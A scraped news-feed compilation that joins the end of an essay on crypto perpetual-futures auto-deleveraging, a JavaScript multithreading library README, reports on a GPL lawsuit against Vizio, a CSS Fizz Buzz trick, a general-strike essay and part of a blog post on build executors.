Then crypto gets reminded about automatic deleveraging (ADL), a detail to perp contracts that few participants understand.

We have altered the terms of your unregulated futures investment contract.

( Pray we do not alter them further. )

Risk in perps has to be symmetric: if (accounting for leverage) there are 100,000 units of Somecoin exposure long, then there are 100,000 units of Somecoin exposure short. This does not imply that the shorts or longs are sufficiently capitalized to actually pay for all the exposure in all instances.

In cases where management deems paying winners from the insurance fund would be too costly and/or impossible, they automatically deleverage some winners. In theory, there is a published process for doing this, because it would be confidence-costing to ADL non-affiliated accounts but pay out affiliated accounts, one’s friends or particularly important counterparties, etc. In theory.

In theory, one likely ADLs accounts which were quite levered before ones which were less levered, and one ADLs accounts which had high profits before ones with lower profits. In theory. [2]

So perhaps you understood, prior to a 20% move, that you were 4X leveraged. You just earned 80%, right? Ah, except you were only 2X leveraged, so you earned 40%. Why were you retroactively only 2X? That’s what automatic deleveraging means. Why couldn’t you get the other 40% you feel entitled to? Because the collective group of losers doesn’t have enough to pay you your winnings and the insurance fund was insufficient or deemed insufficient by management.

ADL is particularly painful for sophisticated market participants doing e.g. a basis trade, because they thought e.g. they were 100 units short via perps and 100 units long somewhere else via spot. If it turns out they were actually 50 units short via perps, but 100 units long, their net exposure is +50 units, and they have very possibly just gotten absolutely shellacked.

In theory, this can happen to the upside or the downside. In practice in crypto, this seems to usually happen after sharp decreases in prices, not sharp increases. For example, October 2025 saw widespread ADLing as (more than) $19 billion of liquidations happened, across a variety of assets. Alameda’s CEO Caroline Ellison testified that they lost over $100 million during the collapse of Terra’s stablecoin in 2022, but since FTX’s insurance fund was made up ; when leveraged traders lost money, their positions were frequently taken up by Alameda. That was quite lucrative much of the time, but catastrophically expensive during e.g. the Terra blowup. Alameda was a good loser and paid the winners, though: with other customers’ assets that they “borrowed.”

An aside about liquidations

In the traditional markets, if one’s brokerage deems one’s assets are unlikely to be able to cover the margin loan from the brokerage one has used, one’s brokerage will issue a margin call. Historically that gave one a relatively short period (typically, a few days) to post additional collateral, either by moving in cash, by transferring assets from another brokerage, or by experiencing appreciation in the value of one’s assets. Brokerages have the option, and in some cases the requirement, to manage risk after or during a margin call by forcing trades on behalf of the customer to close positions.

It sometimes surprises crypto natives that, in the case where one’s brokerage account goes negative and all assets are sold, with a negative remaining balance, the traditional markets largely still expect you to pay that balance . This contrasts with crypto, where the market expectation for many years was that the customer was Daffy Duck with a gmail address and a pseudonymous set of numbered accounts recorded on a blockchain, and dunning them was a waste of time. Crypto exchanges have mostly, in the intervening years, either stepped up their game regarding KYC or pretended to do so, but the market expectation is still that a defaulting user will basically never successfully recover. (Note that the legal obligation to pay is not coextensive with users actually paying. The retail speculators with $25,000 of capital that the pattern day trade rules are worried about will often not have $5,000 to cover a deficiency. On the other end of the scale, when a hedge fund blows up, the fund entity is wiped out, but its limited partners—pension funds, endowments, family offices—are not on the hook to the prime broker, and nobody expects the general partner to start selling their house to make up the difference.)

So who bears the loss when the customer doesn’t, can’t, or won’t? The waterfall depends on market, product type, and geography, but as a sketch: brokerages bear the loss first, out of their own capital. They’re generally required to keep a reserve for this purpose.

A brokerage will, in the ordinary course of business, have obligations to other parties which would be endangered if they were catastrophically mismanaged and could not successfully manage risk during a downturn. (It’s been known to happen, and even can be associated with assets rather than liabilities .) In this case, most of those counterparties are partially insulated by structures designed to insure the peer group. These include e.g. clearing pools, guaranty funds capitalized by the member firms of a clearinghouse, the clearinghouse’s own capital, and perhaps mutualized insurance pools. That is the rough ordering of the waterfall, which varies depending geography/product/market.

One can imagine a true catastrophe which burns through each of those layers of protection, and in that case, the clearinghouse might be forced to assess members or allocate losses across survivors. That would be a very, very bad day, but contracts exist to be followed on very bad days.

One commonality with crypto, though: this system is also not fully capitalized against all possible events at all times. Unlike crypto, which for contingent reasons pays some lip service to being averse to credit even as it embraces leveraged trading, the traditional industry relies extensively on underwriting risk of various participants.

Will crypto successfully “export” perps?

Many crypto advocates believe that they have something which the traditional finance industry desperately needs. Perps are crypto’s most popular and lucrative product, but they probably won’t be adopted materially in traditional markets.

Existing derivatives products already work reasonably well at solving the cost of capital issue. Liquidations are not the business model of traditional brokerages. And learning, on a day when markets are 20% down, that you might be hedged or you might be bankrupt, is not a prospect which fills traditional finance professionals with the warm fuzzies.

And now you understand the crypto markets a bit better.

[0] Brokers trading with their own customers can happen in the ordinary course of business, but has been progressively discouraged in traditional finance, as it enables frontrunning.

Frontrunning, while it is understood in the popular parlance to mean “trading before someone else can trade” and often brought up in discussions of high frequency trading using very fast computers, does not historically mean that. It historically describes a single abusive practice: a broker could basically use the slowness of traditional financial IT systems to give conditional post-facto treatment to customer orders, taking the other side of them (if profitable) or not (if not). Frontrunning basically disappeared because customers now get order confirms almost instantly by computer not at end of day via a phone call. The confirm has the price the trade executed at on it.

In classic frontrunning, you sent the customer’s order to the market (at some price X), waited a bit, and then observed a later price Y. If Y was worse for the customer than X, well, them’s the breaks on Wall Street. If Y was better, you congratulated the customer on their investing acumen, and informed them that they had successfully transacted at Z, a price of your choosing between X and Y. You then fraudulently inserted a recorded transaction between the customer and yourself earlier in the day, at price Z, and assigned the transaction which happened at X to your own account, not to the customer’s account.

Frontrunning was a lucrative scam while it lasted, because (effectively) the customer takes 100% of the risk of the trade but the broker gets any percentage they want of the first day’s profits. This is potentially so lucrative that smart money (and some investors in his funds!) thought Madoff was doing it, thus generating the better-than-market stable returns for over a decade through malfeasance. Of frontrunning Madoff was entirely innocent.

Some more principled crypto participants have attempted to discourage exchanges from trading with their own customers. They have mostly been unsuccessful: Merit Peak Limited is Binance’s captive entity which does this. It also is occasionally described by U.S. federal agencies as running a sideline in money laundering, Alameda Research was FTX’s affiliated trading fund. Their management was criminally convicted of money laundering. etc, etc.

One of the reasons this behavior is so adaptive is because the billions of dollars sloshing around can be described to banks as “proprietary trading” and “running an OTC desk”, and an inattentive bank (like, say, Silvergate, as recounted here ) might miss the customer fund flows they would have been formally unwilling to facilitate. This is a useful feature for sophisticated crypto participants, and so some of them do not draw attention to the elephant in the room, even though it is averse to their interests.

[1] Not all crypto trades are pre-funded. Crypto OTC transactions sometimes settle on T+1, with the OTC desk essentially extending credit in the fashion that a prime broker would in traditional markets. But most transactions on exchanges have to be paid immediately in cash already at the venue. This is very different from traditional equity market structure, where venues don’t typically receive funds flow at all, and settling/clearing happens after the fact, generally by a day or two.

[2] I note, for the benefit of readers of footnote 0, that there is often a substantial gap between the time when market dislocation happens and when a trader is informed they were ADLed. The implications of this are left as an exercise to the reader.

Want more essays in your inbox?

I write about the intersection of tech and finance, approximately biweekly. It's free.

The missing standard library for multithreading in JavaScript

Hacker News
github.com
2025-12-05 21:09:11
Comments...
Original Article
Logo

License Downloads NPM version GitHub Repo stars

Multithreading.js

Multithreading is a TypeScript library that brings robust, Rust-inspired concurrency primitives to the JavaScript ecosystem. It provides a thread-pool architecture, strict memory safety semantics, and synchronization primitives like Mutexes, Read-Write Locks, and Condition Variables.

This library is designed to abstract away the complexity of managing WebWorkers , serialization, and SharedArrayBuffer complexities, allowing developers to write multi-threaded code that looks and feels like standard asynchronous JavaScript.

Installation

npm install multithreading

Core Concepts

JavaScript is traditionally single-threaded. To achieve true parallelism, this library uses Web Workers. However, unlike standard Workers, this library offers:

  1. Managed Worker Pool : Automatically manages a pool of threads based on hardware concurrency.
  2. Shared Memory Primitives : Tools to safely share state between threads without race conditions.
  3. Scoped Imports : Support for importing external modules and relative files directly within worker tasks.
  4. Move Semantics : Explicit data ownership transfer to prevent cloning overhead.

Quick Start

The entry point for most operations is the spawn function. This submits a task to the thread pool and returns a handle to await the result.

import { spawn } from "multithreading";

// Spawn a task on a background thread
const handle = spawn(() => {
  // This code runs in a separate worker
  const result = Math.random();
  return result;
});

// Wait for the result
const result = await handle.join();

if (result.ok) {
  console.log("Result:", result.value); // 0.6378467071314606
} else {
  console.error("Worker error:", result.error);
}

Passing Data: The move() Function

Because Web Workers run in a completely isolated context, functions passed to spawn cannot capture variables from their outer scope. If you attempt to use a variable inside the worker that was defined outside of it, the code will fail.

To get data from your main thread into the worker, you have to use the move() function.

The move function accepts variadic arguments. These arguments are passed to the worker function in the order they were provided. Despite the name, move handles data in two ways:

  1. Transferable Objects (e.g., ArrayBuffer , Uint32Array ): These are "moved" (zero-copy). Ownership transfers to the worker, and the original becomes unusable in the main thread.
  2. Non-Transferable Objects (e.g., JSON, numbers, strings): These are cloned via structured cloning. They remain usable in the main thread.
import { spawn, move } from "multithreading";

// Will be transfered
const largeData = new Uint8Array(1024 * 1024 * 10); // 10MB
// Will be cloned
const metaData = { id: 1 };

// We pass arguments as a comma-separated list.
const handle = spawn(move(largeData, metaData), (data, meta) => {
  console.log("Processing ID:", meta.id);
  return data.byteLength;
});

await handle.join();

SharedJsonBuffer: Sharing Complex Objects

SharedJsonBuffer enables Mutex-protected shared memory for JSON objects, eliminating the overhead of postMessage data copying. Unlike standard buffers, it handles serialization automatically. It supports partial updates, re-serializing only changed bytes rather than the entire object tree for high-performance state synchronization.

import { move, Mutex, SharedJsonBuffer, spawn } from "multithreading";

const sharedState = new Mutex(new SharedJsonBuffer({
  score: 0,
  players: ["Main Thread"],
  level: {
    id: 1,
    title: "Start",
  },
}));

await spawn(move(sharedState), async (lock) => {
  using guard = await lock.acquire();

  const state = guard.value;

  console.log(`Current Score: ${state.score}`);

  // Modify the data
  state.score += 100;
  state.players.push("Worker1");

  // End of scope: Lock is automatically released here
}).join();

// Verify on main thread
using guard = await sharedState.acquire();

console.log(guard.value); // { score: 100, players: ["Main Thread", "Worker1"], ... }

Synchronization Primitives

When multiple threads access shared memory (via SharedArrayBuffer ), race conditions occur. This library provides primitives to synchronize access safely.

Best Practice: It is highly recommended to use the asynchronous methods (e.g., acquire , read , write , wait ) rather than their synchronous counterparts. Synchronous blocking halts the entire Worker thread, potentially pausing other tasks sharing that worker.

1. Mutex (Mutual Exclusion)

A Mutex ensures that only one thread can access a specific piece of data at a time.

Option A: Automatic Management (Recommended)

This library leverages the Explicit Resource Management proposal ( using keyword). When you acquire a lock, it returns a guard. When that guard goes out of scope, the lock is automatically released.

import { spawn, move, Mutex } from "multithreading";

const buffer = new SharedArrayBuffer(4);
const counterMutex = new Mutex(new Int32Array(buffer));

spawn(move(counterMutex), async (mutex) => {
  // 'using' automatically calls dispose() at the end of the scope
  using guard = await mutex.acquire();
  
  guard.value[0]++;
  
  // End of scope: Lock is automatically released here
});

Option B: Manual Management (Bun / Standard JS)

If you are using Bun (which doesn't natively support using and uses a transpiler which is incompatible with this library) or prefer standard JavaScript syntax, you must manually release the lock using drop() . Always use a try...finally block to ensure the lock is released even if an error occurs.

import { spawn, move, Mutex } from "multithreading";

const buffer = new SharedArrayBuffer(4);
const counterMutex = new Mutex(new Int32Array(buffer));

spawn(move(counterMutex), async (mutex) => {
  // Note that we have to import drop here, otherwise it wouldn't be available
  const { drop } = await import("multithreading");

  // 1. Acquire the lock manually
  const guard = await mutex.acquire();

  try {
    // 2. Critical Section
    guard.value[0]++;
  } finally {
    // 3. Explicitly release the lock
    drop(guard);
  }
});

2. RwLock (Read-Write Lock)

A RwLock is optimized for scenarios where data is read often but written rarely. It allows multiple simultaneous readers but only one writer.

import { spawn, move, RwLock } from "multithreading";

const lock = new RwLock(new Int32Array(new SharedArrayBuffer(4)));

// Spawning a Writer
spawn(move(lock), async (l) => {
  // Blocks until all readers are finished (asynchronously)
  using guard = await l.write(); 
  guard.value[0] = 42;
});

// Spawning Readers
spawn(move(lock), async (l) => {
  // Multiple threads can hold this lock simultaneously
  using guard = await l.read(); 
  console.log(guard.value[0]);
});

3. Semaphore

A Semaphore limits the number of threads that can access a resource simultaneously. Unlike a Mutex (which allows exactly 1 owner), a Semaphore allows N owners. This is essential for rate limiting, managing connection pools, or bounding concurrency.

import { spawn, move, Semaphore } from "multithreading";

// Initialize with 3 permits (allowing 3 concurrent tasks)
const semaphore = new Semaphore(3);

for (let i = 0; i < 10; i++) {
  spawn(move(semaphore), async (sem) => {
    console.log("Waiting for slot...");
    
    // Will wait (async) if 3 threads are already working
    using _ = await sem.acquire(); 
    
    console.log("Acquired slot! Working...");

    await new Promise(r => setTimeout(r, 1000));
    
    // Guard is disposed automatically, releasing the permit for the next thread
  });
}

Manual Release

Like the Mutex, if you cannot use the using keyword, you can manually manage the lifecycle.

spawn(move(semaphore), async (sem) => {
  const { drop } = await import("multithreading");
  // Acquire 2 permits at once
  const guard = await sem.acquire(2);
  
  try {
    // Critical Section
  } finally {
    // Release the 2 permits
    drop(guard);
  }
});

4. Condvar (Condition Variable)

A Condvar allows threads to wait for a specific condition to become true. It saves CPU resources by putting the task to sleep until it is notified, rather than constantly checking a value.

import { spawn, move, Mutex, Condvar } from "multithreading";

const mutex = new Mutex(new Int32Array(new SharedArrayBuffer(4)));
const cv = new Condvar();

spawn(move(mutex, cv), async (lock, cond) => {
  using guard = await lock.acquire();
  
  // Wait until value is not 0
  while (guard.value[0] === 0) {
    // wait() unlocks the mutex, waits for notification, then re-locks.
    await cond.wait(guard);
  }
  
  console.log("Received signal, value is:", guard.value[0]);
});

Channels (MPMC)

For higher-level communication, this library provides a Multi-Producer, Multi-Consumer (MPMC) bounded channel. This primitive mimics Rust's std::sync::mpsc but allows for multiple consumers. It acts as a thread-safe queue that handles backpressure, blocking receivers when empty and blocking senders when full.

Channels are the preferred way to coordinate complex workflows (like job queues or pipelines) between workers without manually managing locks.

Key Features

  • Arbitrary JSON Data: Channels are backed by SharedJsonBuffer , allowing you to send any JSON-serializable value (objects, arrays, strings, numbers, booleans) through the channel, not just raw integers.
  • Bounded: You define a capacity. If the channel is full, send() waits. If empty, recv() waits.
  • Clonable: Both Sender and Receiver can be cloned and moved to different workers.
  • Reference Counted: The channel automatically closes when all Senders are dropped (indicating no more data will arrive) or all Receivers are dropped.

Example: Worker Pipeline with Objects

import { spawn, move, channel } from "multithreading";

// Create a channel that holds objects
const [tx, rx] = channel<{ hello: string }>();

// Producer Thread
spawn(move(tx), async (sender) => {
  await sender.send({ hello: "world" });
  await sender.send({ hello: "multithreading" });
  // Sender is destroyed here, automatically closing the channel
});

// Consumer Thread
spawn(move(rx.clone()), async (rx) => {
  for await (const value of rx) {
    console.log(value); // { hello: "world" }
  }
});

// Because we cloned rx, we can also receive on the main thread 
for await (const value of rx) {
  console.log(value); // { hello: "world" }
}

Importing Modules in Workers

One of the most difficult aspects of Web Workers is handling imports. This library handles this automatically, enabling you to use dynamic await import() calls inside your spawned functions.

You can import:

  1. External Libraries: Packages from npm/CDN (depending on environment).
  2. Relative Files: Files relative to the file calling spawn .

Note: The function passed to spawn must be self-contained or explicitly import what it needs. It cannot access variables from the outer scope unless they are passed via move() .

Example: Importing Relative Files and External Libraries

Assume you have a file structure:

  • main.ts
  • utils.ts (contains export const magicNumber = 42; )
// main.ts
import { spawn } from "multithreading";

spawn(async () => {
  // 1. Importing a relative file
  // This path is relative to 'main.ts' (the caller location)
  const utils = await import("./utils.ts");
  // 2. Importing an external library (e.g., from a URL or node_modules resolution)
  const _ = await import("lodash");

  console.log("Magic number from relative file:", utils.magicNumber);
  console.log("Random number via lodash:", _.default.random(1, 100));
  
  return utils.magicNumber;
});

API Reference

Runtime

  • spawn(fn) : Runs a function in a worker.
  • spawn(move(arg1, arg2, ...), fn) : Runs a function in a worker with specific arguments transferred or copied.
  • initRuntime(config) : Initializes the thread pool (optional, lazy loaded by default).
  • shutdown() : Terminates all workers in the pool.

Memory Management

  • move(...args) : Marks arguments for transfer (ownership move) rather than structured clone. Accepts a variable number of arguments which map to the arguments of the worker function.
  • drop(resource) : Explicitly disposes of a resource (calls [Symbol.dispose] ). This is required for manual lock management in environments like Bun.
  • SharedJsonBuffer : A class for storing JSON objects in shared memory.

Channels (MPMC)

  • channel<T>(capacity) : Creates a new channel. Returns [Sender<T>, Receiver<T>] .
  • Sender<T> :
    • send(value) : Async. Returns Promise<Result<void, Error>> .
    • sendSync(value) : Blocking. Returns Result<void, Error> .
    • clone() : Creates a new handle to the same channel (increments ref count).
    • close() : Manually closes the channel for everyone.
  • Receiver<T> :
    • recv() : Async. Returns Promise<Result<T, Error>> .
    • recvSync() : Blocking. Returns Result<T, Error> .
    • clone() : Creates a new handle to the same channel.
    • close() : Manually drops this handle.

Synchronization

  • Mutex<T> :
    • acquire() : Async lock (Recommended). Returns Promise<MutexGuard> .
    • tryLock() : Non-blocking attempt. Returns boolean.
    • acquireSync() : Blocking lock (Halts Worker). Returns MutexGuard .
  • RwLock<T> :
    • read() : Async shared read access (Recommended).
    • write() : Async exclusive write access (Recommended).
    • readSync() / writeSync() : Synchronous/Blocking variants.
  • Semaphore :
    • acquire(amount?) : Async wait for n permits. Returns SemaphoreGuard .
    • tryAcquire(amount?) : Non-blocking. Returns SemaphoreGuard or null .
    • acquireSync(amount?) : Blocking wait. Returns SemaphoreGuard .
  • Condvar :
    • wait(guard) : Async wait (Recommended). Yields execution.
    • notifyOne() : Wake one waiting thread.
    • notifyAll() : Wake all waiting threads.
    • waitSync(guard) : Blocking wait (Halts Worker).

Technical Implementation Details

For advanced users interested in the internal mechanics:

  • Serialization Protocol : The library uses a custom "Envelope" protocol ( PayloadType.RAW vs PayloadType.LIB ). This allows complex objects like Mutex handles to be serialized, sent to a worker, and rehydrated into a functional object connected to the same SharedArrayBuffer on the other side.
  • Atomics : Synchronization is built on Int32Array backed by SharedArrayBuffer using Atomics.wait and Atomics.notify .
  • Import Patching : The spawn function analyzes the stack trace to determine the caller's file path. It then regex-patches import() statements within the worker code string to ensure relative paths resolve correctly against the caller's location, rather than the worker's location.

Judge Signals Win for Software Freedom Conservancy in Vizio GPL Case

Hacker News
fossforce.com
2025-12-05 20:42:04
Comments...
Original Article

A California judge has tentatively sided with Software Freedom Conservancy in its GPL case over Vizio’s SmartCast TVs, but the final outcome of this week’s hearing is still pending.

Source: Pixabay

We’re waiting to hear the final outcome of a legal case involving the GPL that harkens back to the bad “good ol’ days” of Linux and open source.

This case involves an action brought against Vizio — a maker of relatively low‑cost flat panel TVs — by Software Freedom Conservancy, which claims that the company has been in violation of the General Public License, version 2 and Lesser General Public License, version 2.1 for many years. The case centers around the company’s SmartCast TVs, which employ Linux, BusyBox, and other software licensed under GPLv2 and LGPLv2.1, without making source code available.

SFC’s standing in the case is as a purchaser of a Vizio smart TV and not as a copyright holder.

SFC has reported that early Thursday morning Judge Sandy N. Leal of the Superior Court of California issued a tentative ruling supporting SFC’s claim that Vizio has a duty to provide SFC with the complete source code covered under open source licenses to a TV it purchased. Being tentative, the ruling isn’t final– such rulings are issued so that the parties know how the judge is leaning and can tailor their oral arguments — and it was issued before a hearing scheduled for 10 a.m. PST the same day.

So far there’s been no news coming out of that hearing, although we’ve reached out to SFC for a comment.

A Predictable Outcome

These days the GPL and other open source licenses have been court tested enough to make the outcome in a case like this somewhat predictable: the courts will support the terms of the license. This hasn’t always been the case. For many years after the first adoption of the GPL as a free software license, and even later when the term open source came into use, it wasn’t clear whether courts would support the terms of open source licensing.

That began to change in the first decade of the 21st century as cases were brought against violators of open source licenses, with license terms being upheld by the courts.

Then in September 2007 the Software Freedom Law Center filed the first-ever US GPL enforcement lawsuit. The defendant was Monsoon Multimedia, for its Hava place‑shifting devices that SFLC claimed shipped with BusyBox installed without provisions for the source code.​ That case was dismissed about a month later, after Monsoon agreed to publish source code, appoint a compliance officer, notify customers of their GPL rights, and pay an undisclosed sum.​

Later that year, SFLC brought additional BusyBox-related GPL suits against other vendors, including Xterasys and Verizon, over failure to provide source code. Those were also settled with compliance commitments and payments.

Vizio: A Goliath in Disguise

In the case against Vizio, SFC is going against a company that can afford a deep pocket defense if it decides to play hardball. The Irvine, California-based company that was founded in 2002 as a designer of televisions, soundbars, and related software and accessories, was acquired by Walmart for $2.3 billion in a deal that was announced in February 2024 and closed that December.

Nextcloud resilient communication and collaboration.

While the acquisition was in progress, Bloomberg announced that Walmart planned to end sales of Vizio products at Amazon and Best Buy in order to turn the company into a private label brand available only at Walmart and Sam’s Club locations.

Assemblies: A Path to Co-Governance and Democratic Renewal

OrganizingUp
convergencemag.com
2025-12-05 20:24:21
Democracy should give us a real say in the decisions that shape our lives, but few people today feel the government is working for them. Inequality is extreme, our economic lives are precarious, and trust in government and all kinds of institutions is at historic lows. All this has opened up space f...

Advertising as a major source of human dissatisfaction (2019) [pdf]

Hacker News
www.andrewoswald.com
2025-12-05 20:18:34
Comments...
Original Article
No preview for link for known binary extension (.pdf), Link: https://www.andrewoswald.com/docs/AdvertisingMicheletal2019EasterlinVolume.pdf.

Fizz Buzz in CSS

Hacker News
susam.net
2025-12-05 20:18:22
Comments...
Original Article

By Susam Pal on 06 Dec 2025

What is the smallest CSS code we can write to print the Fizz Buzz sequence? I think it can be done in four lines of CSS as shown below:

li { counter-increment: n }
li:not(:nth-child(5n))::before { content: counter(n) }
li:nth-child(3n)::before { content: "Fizz" }
li:nth-child(5n)::after { content: "Buzz" }

Here is a complete working example: css-fizz-buzz.html .

I am neither a web developer nor a code-golfer. Seasoned code-golfers looking for a challenge can probably shrink this solution further. However, such wizards are also likely to scoff at any mention of counting lines of code, since CSS can be collapsed into a single line. The number of characters is probably more meaningful. The code can also be minified slightly by removing all whitespace:

$ curl -sS https://susam.net/css-fizz-buzz.html | sed -n '/counter/,/after/p' | tr -d '[:space:]'
li{counter-increment:n}li:not(:nth-child(5n))::before{content:counter(n)}li:nth-child(3n)::before{content:"Fizz"}li:nth-child(5n)::after{content:"Buzz"}

This minified version is composed of 152 characters:

$ curl -sS https://susam.net/css-fizz-buzz.html | sed -n '/counter/,/after/p' | tr -d '[:space:]' | wc -c
152

If you manage to create a shorter solution, please do leave a comment.

Framework Sponsors CachyOS

Hacker News
discuss.cachyos.org
2025-12-05 20:03:21
Comments...

Maybe a General Strike Isn’t So Impossible Now

Portside
portside.org
2025-12-05 19:54:03
Maybe a General Strike Isn’t So Impossible Now Maureen Fri, 12/05/2025 - 14:54 ...
Original Article

[This article is part of a Labor Notes roundtable series: How Can Unions Defend Worker Power Against Trump 2.0? We will be publishing more contributions here and in our magazine in the months ahead. Click here to read the rest of the series. —Editors]

Trump’s attacks on working people—threats to send troops into major U.S. cities, ripping collective bargaining rights from a million federal workers, an immigration enforcement terror campaign that borders on unconstitutional—have been so extreme that many people are talking about a general strike. These calls are coming not just from the usual suspects, but even from my own mayor, former Chicago Teachers Union leader and organizer Brandon Johnson.

We’ve all heard calls for a general strike before—usually not as a serious proposal or strategy, but as a reaction to the attacks that working people face on a regular basis from existing political and economic power. Such calls are easy to dismiss, because they tend to come from well-meaning people without the knowledge of how difficult a strike is to launch and win in a single shop, let alone across a country of 330 million people that hasn’t seen anything approaching a national general strike in almost 150 years.

Those of us who have done the hard work of organizing our co-workers, winning union recognition, and negotiating with recalcitrant employers have frequently dismissed the idea out of hand. But two years ago, in the wake of the “Stand-Up Strike” at the Big 3 U.S. automakers, United Auto Workers President Shawn Fain put the idea on the table when he called on the labor movement to prepare to strike together on May 1, 2028.

At first glance it sounds impossible—but a strategic look back at the coordinated strikes and militancy of the past two decades shows we might be much closer than we think. We’ve laid the groundwork. Now we have to harness the lessons from those fights and “speed-run” to much larger, disruptive actions.

PROVOCATIVE CONDITIONS

The preconditions for large-scale coordinated actions are being laid out in plain view. Draconian, racist attacks on entire communities with the veneer of immigration enforcement. Gigantic tax cuts for the wealthy and corporations—which, along with economic contraction and federal budget cuts, will lead to huge budget challenges in statehouses and city halls across the country.

The attacks on democracy, immigrants, and the rule of law have already led to some of the largest mass mobilizations in U.S. history, including on October 18, when millions of people across the country joined thousands of “No Kings” protests. For the labor movement, the question is: when do we shift from mass mobilizations to mass economic action?

The first half of 2026 is the critical moment. State legislators across the country will begin their deliberations over budgets hobbled by the hollowing-out of the federal government, at the same time that the $170 billion increase to ICE’s budget begins moving in earnest. Public colleges and universities will begin feeling the even deeper impact of the Trump administration’s cuts and attacks, as tech oligarchs and finance capital continue to bleed workers and the public sector.

We need to plan now to connect and coordinate these fights in our cities and states. Not a top-down national plan or centralized day of action, but to make a plan in every state.


FOUR LESSONS

Here are four important lessons we can learn from the recent past:

Immigrant community defense must be understood as economic action, and lifted up. In 2006, the national movement for “A Day Without an Immigrant” began with a march of 100,000 on March 10, and peaked on May 1 , when 500,000 immigrants and allies marched through downtown Chicago.

So many immigrant workers and their allies participated in that day’s action, also known as the “Great American Boycott,” that large parts of the Chicago area were effectively shut down for economic activity. Stores and restaurants closed either in solidarity with their workers or of necessity, with not enough staff to function.

Bring labor and community together to coordinate campaigns. Ten years after the reemergence of May Day, in the midst of what would become a two-year-long Illinois state budget stalemate under a billionaire Republican governor, the Chicago Teachers Union went on a one-day strike to protest the budget impasse and call for full funding of schools.

For most of 2015, CTU and SEIU Healthcare Illinois had jointly convened a coalition of local unions, united in a commitment to progressive working-class politics and militant action, to coordinate campaigns and share strategies.

Because of that coalition’s work, a dozen unions participated in the 2016 one-day strike , including fast food workers with the Fight for 15, higher education unions from Chicago State and Northeastern Illinois universities, and childcare and homecare workers from SEIU HCII, along with a large community coalition led by both longtime neighborhood groups and key organizers of the Black Lives Matter movement.

Push our unions to take bigger risks, especially in key sectors. In February 2018, incensed by insulting wage proposals from another billionaire Republican governor, West Virginia teachers set off what would become a nationwide wave of city and statewide teacher strikes , the Red for Ed movement. Some were one-day strikes billed as “days of action”; some were sustained for weeks. Importantly, almost all of the multi-district and statewide walkouts happened in states where teachers were prohibited by law from going on strike—but they went on strike anyway.

Public school teachers, by their nature, are embedded in communities. To varying degrees, so are many other groups of workers: in state and county governments, nursing homes and health clinics, community colleges, grocery stores, and restaurants. These are all potentially key sectors that have public reach and visibility across diverse communities.

Line up contract expiration dates and demands across industries, and work with community allies to publicize demands for the common good. In March 2024, unions representing more than 15,000 workers in the Twin Cities coordinated strike authorization votes across several industries .

This effort, launched publicly in October 2023, included teachers, transit workers, janitors, nursing home workers, and retail workers from six different unions. It was the product of intense joint campaigning and leadership development.

The simple threat of coordinated strike action led to big contract wins for transit workers, Minneapolis city workers, and security officers, while an even broader coalition of labor and community allies supported janitors, nursing home workers, and retail workers through their strikes.

PROGRESS IN UPHEAVAL

One thing we know about the coming months is that the attacks from Trump and his corporate allies will only sharpen. And the structures that exist now—our unions and other organized groups that are fighting for immigrant justice, tenant rights, and a fair economy, as scattered and weak as they may be—are the vehicles we have to organize a fightback.

In the history of this country, worker movements have been the critical central driver toward justice and equality. But workers have always faced daunting odds against powerful opponents with the ability to disorganize and disorient us.

The progress we make is not linear, but happens in moments of upheaval and upsurge. Our task isn’t to create the perfect strategy for the masses to follow. It is to use the lessons of the past to set the table for the fights of the future.

I want a better build executor

Lobsters
jyn.dev
2025-12-05 19:50:48
Comments...
Original Article

This post is part 4/4 of a series about build systems .


The market fit is interesting. Git has clearly won, it has all of the mindshare, but since you can use jj to work on Git repositories, it can be adopted incrementally. This is, in my opinion, the only viable way to introduce a new VCS: it has to be able to be partially adopted.

Steve Klabnik

If you've worked with other determinism-based systems, one thing they have in common is they feel really fragile, and you have to be careful that you don't do something that breaks the determinism. But in our case, since we've created every level of the stack to support this, we can offload the determinism to the development environment and you can basically write whatever code you want without having to worry about whether it's going to break something.

Allan Blomquist

In my last post , I describe an improved build graph serialization. In this post, I describe the build executor that reads those files.

what is a build executor?

Generally, there are three stages to a build:

  1. Resolving and downloading dependencies. The tool that does this is called a package manager . Common examples are npm , pip , Conan 1 , and the cargo resolver .
  2. Configuring the build based on the host environment and build targets. I am not aware of any common name for this, other than maybe configure script (but there exist many tools for this that are not just shell scripts). Common examples are CMake, Meson, autotools, and the Cargo CLI interface (e.g. --feature and --target ).
  3. Executing a bunch of processes and reporting on their progress. The tool that does this is called a build executor . Common examples are make , ninja , docker build , and the Compiling phase of cargo build .

There are a lot more things an executor can do than just spawning processes and showing a progress report! This post explores what those are and sketches a design for a tool that could improve on current executors.

change detection

Ninja depends on mtimes, which have many issues . Ideally, it would take notes from redo and look at file attributes, not just the mtime, which eliminates many more false positives.

querying

I wrote earlier about querying the build graph . There are two kinds of things you can query: The configuration graph (what bazel calls the target graph ), which shows dependencies between "human meaningful" packages; and the action graph , which shows dependencies between files.

Queries on the action graph live in the executor; queries on the configuration graph live in the configure script. For example, cargo metadata / cargo tree , bazel query , and cmake --graphiz query the configuration graph; ninja -t inputs and bazel aquery query the action graph. Cargo has no stable way to query the action graph.

Note that “querying the graph” is not a binary yes/no. Ninja's query language is much more restricted than Bazel's. Compare Ninja's syntax for querying “the command line for all C++ files used to build the target //:hello_world 2 :

$ ninja -t inputs hello_world | grep '\.c++$' | xargs ninja -t targets | cut -d : -f 1 | xargs ninja -t commands
g++ -c -o my_lib.o my_lib.cpp
g++ -o hello_world hello_world.cpp my_lib.o

to Bazel's:

$ bazel aquery 'inputs(".*cpp", deps(//:hello_world))'
action 'Compiling hello_world.cpp'
  Mnemonic: CppCompile
  Target: //:hello_world
  Configuration: k8-fastbuild
  Execution platform: @@platforms//host:host
  ActionKey: 155b2cdb875736efc8d218ea790d2ef9ce698f0b1b1700d58de3c135145b1d12
  Inputs: [external/rules_cc++cc_configure_extension+local_config_cc/builtin_include_directory_paths, external/rules_cc++cc_configure_extension+local_config_cc/cc_wrapper.sh, external/rules_cc++cc_configure_extension+local_config_cc/deps_scanner_wrapper.sh, external/rules_cc++cc_configure_extension+local_config_cc/validate_static_library.sh, hello_world.cpp, my_lib.h]
  Outputs: [bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.d, bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.o]
  Command Line: (exec /nix/store/vr15iyyykg9zai6fpgvhcgyw7gckl78w-gcc-wrapper-14.3.0/bin/gcc \
full command line
    -U_FORTIFY_SOURCE \
    -fstack-protector \
    -Wall \
    -Wunused-but-set-parameter \
